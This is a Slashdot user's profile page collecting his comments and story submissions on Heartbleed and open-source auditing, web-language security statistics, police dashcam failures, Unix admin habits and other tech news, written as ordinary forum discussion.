×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Comments

top

How Does Heartbleed Alter the 'Open Source Is Safer' Discussion?

hawguy Re:NSA (527 comments)

The huge problem with OSS is that if no one takes the responsibility to do a good code audit for a project, the NSA will do that independently, file the found exploits, and tell nobody.

Of course, the flip side is that if you *want* to do a good code audit for software you're using, you can do it on your own with open source software (and you can review code changes in patches before applying them). However, with closed source software, you can (usually) only take the word of the closed source company and have to trust that they haven't purposely inserted back doors into the code.

And once one company does the audit, they can share it with others (or a group of companies could share the costs of the audit), and all users, no matter how large or small, can validate that the code they are running matches the audited code.

Of course, an audit isn't a guarantee of finding a bug (which is just as true for closed source software as it is for open source software), but at least with open source code, a company that finds a bug can choose to fix it immediately without waiting for it to filter through a large company's release process.

2 days ago
top

The Security of Popular Programming Languages

hawguy How does a language remediate anything? (183 comments)

I don't understand this:

Perl remediates 85% of all Cross-Site Scripting vulnerabilities, the highest rate among all languages but only 18% of SQL Injection.

There is no Perl language support to remediate cross site scripting. That's all done by the developer and/or framework he's using, so I don't see how it's useful to say that Perl remediates 85% of XSS vulnerabilities when the language itself has no idea what XSS is or how to remediate it.

I'm also having trouble reconciling this statement:

Perl has an observed rate of 67% Cross-Site Scripting vulnerabilities, over 17% more than any other language.

So Perl re mediates 85% of XSS vulnerabilities -- the highest rate of any language, yet it has a 17% higher rate of XSS vulnerabilities?

This study would be slightly more useful if they gave details on web frameworks instead of just languages.

I'm surprised Ruby and Python didn't make the list, I figured that either one of those languages would be more popular than Perl for web development today

2 days ago
top

Climate Scientist: Climate Engineering Might Be the Answer To Warming

hawguy Re:Climate engineering? (338 comments)

Considering this is a non-problem to start with, we'd absolutely be doing more harm than good. This was the most brutal winter I've seen in over 20 years. It seems like every other day I was plowing more global warming off my driveway and we just got another 5" of global warming last night that I had to shovel off my walk.

Why do so many people confuse weather with climate?

2 days ago
top

Google Buys Drone Maker Titan Aerospace

hawguy Re:Why in the FUCK (41 comments)

would either Google or especially Facebook be buying drone companies? These companies obviously have WAY too much money and are WAY overvalued. I suppose it is smart that rather than wait for the bubble to burst and the share price to crash, wiping out billions in value, they're trying to get stuff that is worth something while they still can. Still, this is actually kind of unsettling to me and makes me wonder if we may cruising obliviously towards the next text meltdown, sooner rather than later?

It's alluded to in the summary, and spelled out in TFA - both companies have shown interest in providing internet access in underserved areas through aerial platforms:

Both Ascenta and Titan Aerospace are in the business of high altitude drones, which cruise nearer the edge of the earth’s atmosphere and provide tech that could be integral to blanketing the globe in cheap, omnipresent Internet connectivity to help bring remote areas online. According to the WSJ, Google will be using Titan Aerospace’s expertise and tech to contribute to Project Loon, the balloon-based remote Internet delivery project it’s currently working on along these lines.

...

The main goal, however, is likely spreading the potential reach of Google and its network, which is Facebook’s aim, too. When you saturate your market and you’re among the world’s most wealthy companies, you don’t go into maintenance mode; you build new ones.

2 days ago
top

GM Names Names, Suspends Two Engineers Over Ignition-Switch Safety

hawguy Why not? (236 comments)

The next time your mail goes down, should we know the name of the guy whose code flaw may have caused that?"

Why not let software engineers take responsibility for their work just like "real" engineers do when they sign off on a project?

The developer responsible for the Heartbleed bug that put the privacy of millions of users at risk stood up and took responsibility for his mistake.

If you know that the world is going to hear about it if you screw up, then maybe you'll take a little more time to vet your work before you sign off on it.

5 days ago
top

NSA Allegedly Exploited Heartbleed

hawguy Re:It's time we own up to this one (149 comments)

It was discovered and fixed so quickly *because* it's open source

For crikessakes, the heartbleed vulnerability existed for over 2 years before being discovered and fixed!

Sorry my bad, that sentence was confusing -- I meant the fix was fast, not finding the bug.

An exact timeline for Hearthbleed is hard to find, but it looks like there was some responsible disclosure of the bug to some large parties about a week before public disclosure and release of the fixed SSL library.

In contract, Apple learned of its SSL vulnerability over a month before they released an IOS patch and even after public disclosure of the bug, it was about a week before they released the OSX patch. And just like the OpenSSL bug, Apple's vulnerability was believed to have been in the wild for about 2 years before detection. (of course, since the library code was opensourced by Apple, several unofficial patches were released before Apple's official patch).

5 days ago
top

Cost Skyrockets For United States' Share of ITER Fusion Project

hawguy Is that a lot of money? (172 comments)

$4B over 20 years is $200M/year -- does anyone in congress even track such a small amount of money? I bet that if a few congressmen looked under the couch cushions in their office they could find more money than that.

5 days ago
top

NSA Allegedly Exploited Heartbleed

hawguy Re:It's time we own up to this one (149 comments)

OK guys. We've promoted Open Source for decades. We have to own up to our own problems.

This was a failure in the Open Source process. It is just as likely to happen to closed source software, and more likely to go unrevealed if it does, which is why we aren't already having our heads handed to us.

But we need to look at whether Open Source projects should be providing the world's security without any significant funding to do so.

If it's just as likely to happen to closed source software, then why is it a failure of the Open Source process? It was discovered and fixed so quickly *because* it's open source - there may be similar holes in closed source software that are being exploited today, yet no white hats have discovered them yet.

5 days ago
top

NSA Allegedly Exploited Heartbleed

hawguy Re:NSA put the bug there, of course they exploited (149 comments)

We need to find out if the author of this bug is or was on the NSA payroll. It would not be surprising to find out he was paid to put it there.

The author responsible for the bug has already admitted that it was a mistake (and it's not like buffer overflows are unheard of, so it really is plausible). Sure, it's possible that the NSA secretly paid him (or ever coerced him by holding some incriminating evidence over his head), but it would likely take someone with the resources of the NSA to uncover such a secret NSA payout. Something of that nature probably wouldn't even be available in Snowden's document archive.

5 days ago
top

Seven Habits of Highly Effective Unix Admins

hawguy Re:Rebooting is not a fix (136 comments)

Bullshit. Windows admins are not trained to reboot when there is a problem

It's amusing that in the post right before yours (and not an AC like you), a Windows Admin explained why he does reboot first:

Because in the Windows world, I usually don't have the luxury of digging into the kernel's or driver's source code to figure out exactly why it has stopped behaving correctly

5 days ago
top

Seven Habits of Highly Effective Unix Admins

hawguy Rebooting is not a fix (136 comments)

As someone who's managed a team of sysadmins that moved to the Linux world from Windows, I have this tip: "Reboot does not fix anything, it just hides things".

For some reason, Windows admins have been trained to reboot immediately when things don't work well rather than to figure out why something is failing. I'm sure this was a valid "fix" in older versions of Windows, but Windows has been stable for quite some time, and things shouldn't mysteriously stop working for no reason. Take a bit of time to figure out *why* the CPU is suddenly spiking on the database server, since if you reboot it, you will have lost most of the evidence for why it's happening, and it's likely to happen again. If it's a production server and you can't spend much time, run a few diagnostics (ps, "top", lsof, etc) and save to a file for the postmortem, but don't just go in and reboot before looking around.

5 days ago
top

NYC Considers Google Glass For Restaurant Inspections

hawguy Re:Why not just use a video camera? (104 comments)

They have solved this problem, it's called a camcorder.

I was thinking the same thing -- they can use a GoPro if they want something rugged, and with a handheld camera the inspector doesn't have to lay down on the floor to shoot footage of the filth underneath the stove.

5 days ago
top

Michael Bloomberg: You Can't Teach a Coal Miner To Code

hawguy Why does it have to be "coding"? (578 comments)

There's no reason to train every worker to "code", we don't suffer from a lack of coders, we suffer from a lack of "developers", and no 6 week software bootcamp is going to turn someone with no programming experience into a developer. Besides, the average coal miner is probably not going to want to sit in front of a computer all day (many in my family work in the heavy construction industry, and I am 100% certain that although you could probably teach my brother to code, you're not going to be able to teach him to sit behind a desk all day).

But there are plenty of other jobs that you *could* teach a former coal miner to do -- not everyone in the economy needs to be a coder any more than everyone needs to be an auto mechanic just because we all (well, mostly) drive cars.

5 days ago
top

LA Police Officers Suspected of Tampering With Their Monitoring Systems

hawguy Re:Convenient malfunctions (322 comments)

The WTOP article drops the story in 2007.

http://en.wikipedia.org/wiki/A...
http://www.washingtonpost.com/...

The Wikipedia article tell us that the case went to court -- you know, like when you feel you've been wronged, and you put the people who wronged you on trial, and the thing is judged by a jury of your peers (normal people not cops), and the jury awarded $5,000 in damages -- the size of some medical bills.

A jury -- of normal people -- thought, after getting much more insight into this case than you or I, that the cops were a little rough on her, and nothing more.

It seems like that's the problem -- the evidence that should have proved her story was non-existent because *seven* police cameras (cameras that we all paid for with our taxes and were *required* to be running due to a settlement with the DoJ) somehow malfunctioned and did not capture any video. How many cameras do you think would have malfunctioned if they backed up the story of the police? All the jury had to go on was her testimony and the testimony of 7+ police officers. I wonder if anyone involved had any vested interest in lying about the events?

Finally, the case is nearly A DECADE OLD.

What's next? Some cases where a firehose got turned on the colored in Mississippi?

7 years ago doesn't seem like that long ago, but are you really holding up past discrimination against blacks by those in authority as a good example of why the past doesn't matter?

about a week ago
top

Raspberry Pi's Eben Upton: How We're Turning Everyone Into DIY Hackers

hawguy Re:Am I getting old? (90 comments)

I'm 54 this year. I love playing with my Pi.

I'm almost as old as you and I've been playing with my pi since my early teens. I still play with it from time to time.

But when did they start calling it a "pi"?

about a week ago
top

LA Police Officers Suspected of Tampering With Their Monitoring Systems

hawguy Re:Convenient malfunctions (322 comments)

Anyone remember the police beating case in Maryland where the dash cams of ALL SEVEN police cars on the scene simultaneously malfunctioned?

No ... and a Google search turns up nothing. Can you provide a reference?

Here's a reference:

http://www.wtop.com/?nid=428&s...

Seven cars responded, all required to have dashcams, yet somehow no dashcam footage of the incident was available.

And here's an article with links to other cases where police video disappeared:

http://www.theagitator.com/201...

And I found it with my first Google search for

about a week ago
top

LA Police Officers Suspected of Tampering With Their Monitoring Systems

hawguy Re:Should be punished (322 comments)

Apart from that there is not reason to go hard on the police officers. There is a simple social solution when problems like this arise.
Split them up. It works on bullies, criminal gangs and neo-nazis.

Relocate them to cities that doesn't have this problem and make sure that none of them works with each other.
Once they are partnered up with honest people and only honest people the undesired behavior will go away.
After a couple of years the can be brought back.

That way the problem disappears without the need to break necks or even prove anything.

-- methane-fueled

Putting even the most honest and trustworthy people into a system of power doesn't guarantee that there will be no abuses -- even honest people abuse their power.

But knowing that someone is looking over your shoulder at all times with surveillance *can* reduce abuses since a cop can't claim "He threatened me!" if no threat was captured on the surveillance device.

about a week ago
top

LA Police Officers Suspected of Tampering With Their Monitoring Systems

hawguy Re:Easy fix (322 comments)

Just deduct the repair bill from their pay. They'll soon start working.

Seems like it would be more effective if judges held police responsible for proper functioning of their recording devices, and gave the benefit of the doubt to those that accuse the police of wrongdoing when the mandated surveillance equipment that could prove the allegations was mysteriously "out of order".

about a week ago
top

Isolated Tribes Die Shortly After We Meet Them

hawguy Weren't they already dying? (351 comments)

Weren't they already in serious decline before being visited?

That first graph shows a lot larger average population before year 0 (the year of contact), which slowly grows in the 20 years after contact.

http://www.nature.com/srep/201...

The original article seems to confirm this:

http://www.nature.com/srep/201...

Estimates of population sizes before sustained peaceful contact (n = 22, recorded an average of 45 years before contact, range 1–106) were on average 5.5 times larger than populations at contact ...

So if populations were 5 times higher before any contact at all, why do they blame the contact for population declines?

about a week ago
top

Smart Car Tipping Trending In San Francisco

hawguy Re:San Fran = the new Detroit (369 comments)

Or maybe they *do* like smart cars, and just find tipping them amusing. I've never heard it suggested that cow-tipping was motivated by any particular dislike for cows or farmers. And with a bit of alcohol (or asshole) in their systems a bunch of bemused people might not even consider the damage done. For that matter was any real damage done? The things have roll cages, and I don't recall seeing any broken headlights, etc. in the photos. I'm sure some people will cite the horrible expense of scratches in the paint, but in terms of mechanical damage all I can think of is possibly draining some of the fluids into places they shouldn't be. And I don't think a car has anything half so prone to orientation damage as a refrigerator - and that's easy enough to fix with a flush and recharge.

Why do you discount the cost of the bodywork? Isn't that still damage? The roll cage isn't there to prevent damage, it's there to prevent the roof from being crushed in a rollover accident. Someone once keyed the side of my car and tore the driver's door handle off in an attempt to break in. It cost $4500 to replace the door and repaint that side of the car - the car itself was only worth around $7000, so it was close to being totaled. A smart car is smaller so the bodywork repairs might cost a bit less, but popping out or replacing the side body panels that were on the ground (sidewalks in SF are made of hard concrete in SF, not of fluffy pillows as they apparently are where you live) and repainting it is still going to be in the thousands. So each car owner is probably going to be out $500 - $1000 or whatever their insurance deductible is, plus whatever amount their insurance increases after they make a claim.

Besides, have drunks ever successfully tipped over a cow? There seems to be a lot of debate about whether or not cow tipping is a real thing, and little evidence that it's real: https://www.google.com/search?...

about a week ago

Submissions

top

Network Solutions hit with DDOS attack

hawguy hawguy writes  |  about 8 months ago

hawguy (1600213) writes "As reported by TechZone 360 as well as a number of blogs and tweets, Network solutions experienced a DDOS attack today, knocking out DNS resolution for thousands of hosts.

Things are improving on the DNS side, but their website is still having problems. They've apparently posted a message about the outage on their website, but I've been unable to load the page.

They posted a brief message on their Facebook page:

Network Solutions is experiencing a Distributed Denial of Service (DDOS) attack that is impacting our customers as well as the Network Solutions site. Our technology team is working to mitigate the situation. Please check back for updates.

"
top

Facebook takes on Google with graph search

hawguy hawguy writes  |  about a year ago

hawguy (1600213) writes "As reported by CNET:

Facebook chief executive Mark Zuckerberg announced Graph Search at a press event today at the company's Menlo Park headquarters, billing it as a new way find people, photos, places and interests that are most relevant to Facebook users.

Graph Search is the social network's response to its massive base of 1 billion users, 240 billion photos, and 1 trillion connections. The tool is meant to provide people the answers to their to their questions about people, photos, places, and interests.

Does anyone have any opinions on FB's latest product?"

Link to Original Source
top

Who is WirelessForAmerica?

hawguy hawguy writes  |  more than 2 years ago

hawguy (1600213) writes "I came across a video for WirelessForAmerica today:

http://www.youtube.com/watch?v=HyyDIk8W6Kw

It warns of an impending wireless spectrum shortage (only 24 months until the disaster hits!), and how they have just the answer, but of course it's being derailed by special interests.

It came off a pure political video — warning of an impending disaster if nothing is done, their solution uses American Ingenuity, will create jobs, etc.

So what's the real story behind WirelessForAmerica? Are we running out of mobile bandwidth? Is their solution really the best alternative? From what I've gleaned from their WirelessForAmerica.org website, they want to use frequencies that are so close to existing GPS frequencies that nearly all existing GPS receivers would need to be replaced and future receivers would need to be designed to better reject neighboring frequencies."

Link to Original Source
top

Power grid change may disrupt clocks

hawguy hawguy writes  |  more than 2 years ago

hawguy (1600213) writes "A yearlong experiment with the nation's electric grid could mess up traffic lights, security systems and some computers — and make plug-in clocks and appliances like programmable coffeemakers run up to 20 minutes fast."
Link to Original Source

Journals

hawguy has no journal entries.

Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...